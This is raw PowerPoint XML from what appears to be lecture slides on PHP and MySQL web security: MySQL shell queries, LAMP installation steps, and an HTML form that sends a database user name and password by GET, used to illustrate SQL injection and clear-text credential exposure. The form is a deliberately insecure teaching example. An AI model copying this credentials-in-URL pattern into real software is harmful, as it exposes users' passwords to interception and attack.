              </a:rPr>
              <a:t>Operator1@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>substring_index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smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>ave </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> invoke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>shell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b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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 -u Operator2 -p</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager_db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  <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Maintenance_Schedule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator_view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1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b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="20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dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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940086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+ MySQL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sz="1800" dirty="0"/>
              <a:t>Web servers that create web pages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>dynamically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> frequently require access to backend databases and not uncommonly this database is MySQL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>eview </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>how a PHP enabled web server works in conjunction with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>management </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>PHP script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>makes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>a direct connection with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>database through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>connect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  <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> function call. Subsequently, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>feeds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>SQL to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>calls and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>retrieves results </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$row </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>associative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> array variable 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&lt;form&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>element</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="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&lt;html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&lt;body&gt;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&lt;form action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>RetrieveFromMySQL.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>" method="get"&gt;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MySQL user name: &lt;input type="text" name="user" /&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br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MySQL user password: &lt;input type="text" name="password" /&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br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&lt;input type="submit" /&gt;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&lt;/form&gt;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&lt;/body&gt;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>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/html&gt;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b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="20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dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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45295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Install Apache, PHP5, &amp; MySQL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Install LAMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(Linux, Apache, MySQL, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>) on Ubuntu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>How to install LAMP on Ubuntu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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How to install LAMP on Ubuntu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean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/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>o automatically resize windows in Ubuntu VM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 New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo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apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>virtualbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-guest-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>dkms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virtualbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-guest-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> virtualbox-guest-x11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3436188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Injection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sz="1800" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>visitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>clicked the “Submit” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>button </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>of the form, that caused his/her browser to send the following URL back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>server hosting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>128.4.131.106/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>RetrieveFromMySQL.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator2&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>operator2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>For this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>is retrieved from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>database is just that row of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Maintenance_Schedule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>table that corresponds to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Operator2 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>URL is sent back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>in clear text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and is therefore visible to anyone carrying out traffic surveillance between where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Operator2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>is located and where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>is installed </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>So it would not be so difficult for an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>adversary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to mount an attack on the server for different possible values for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and the password fields </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>A major </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>enabler of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>SQL injection attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>was the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>method for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> submission </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>method for form submission, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>all of the form fields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> become a part of the URL that is sent back to the web server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>More complex cases of the same could cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>stored procedures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to be injected into a database and to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>subsequently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>executed 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b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="20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pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
